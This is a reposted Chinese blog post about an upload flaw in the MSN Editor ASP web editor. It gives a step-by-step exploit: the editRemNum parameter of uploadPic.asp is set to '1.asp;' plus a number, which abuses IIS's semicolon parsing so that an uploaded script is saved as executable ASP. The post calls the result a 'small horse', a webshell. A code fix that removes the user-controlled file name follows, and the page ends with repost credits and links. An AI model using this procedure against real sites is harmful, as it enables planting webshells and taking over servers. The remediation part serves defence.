MSN Editor 0DAY
簡單說下利用的方法吧。
點(diǎn)擊圖片上傳后會出現(xiàn)上傳頁面,地址為
http://www.xxx.cn/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=
用普通的圖片上傳后,地址為
http://www.xxx.cn/news/admin/uploadPic.asp?language=&editImageNum=1&editRemNum=41513102009204012
很明顯。圖片的地址是根據(jù)RemNum后面的編號生成的。
利用很簡單 配合IIS的解析漏洞,把RemNum后面的數(shù)據(jù)修改為1.asp;41513102009204012
變成下面這個地址
http://www.xxx.cn/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=1.asp;41513102009204012
然后在瀏覽器里打開
然后選擇你的腳本***上傳
將會返回下面的地址
uppic/1.asp;41513102009204012_2.gif
然后直接打開就是我們的小馬地址!
[紅科網(wǎng)安]漏洞修補(bǔ)建議:
關(guān)鍵代碼:
???????????? if editRemNum<>"" then????????????????
??????????????? remNum = editRemNum
???????????? else
??????????????? Randomize
??????????????? remNum = Int((999 - 1 + 1) * Rnd + 1)&day(date)&month(date)&year(date)&hour(time)&minute(time)&second(time)
???????????? end if
???????????? remFileName = remNum&"_"&(editImageNum+1)&".gif"
????????? end if
?
去掉自定義部分,只留下隨機(jī)參數(shù)即可。
保留代碼:
??????????????? Randomize
??????????????? remNum = Int((999 - 1 + 1) * Rnd + 1)&day(date)&month(date)&year(date)&hour(time)&minute(time)&second(time)
???????????? end if
???????????? remFileName = remNum&"_"&(editImageNum+1)&".gif"
文章如轉(zhuǎn)載,請注明轉(zhuǎn)載自【網(wǎng)管小王的獨(dú)立博客】:http://www.5iadmin.com/
轉(zhuǎn)載于:https://blog.51cto.com/shanzhai/924615
總結(jié)
以上是生活随笔為你收集整理的MSN Editor 0DAY的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: PsTools在***中的一点小应用
- 下一篇: 快速读懂邮件头信息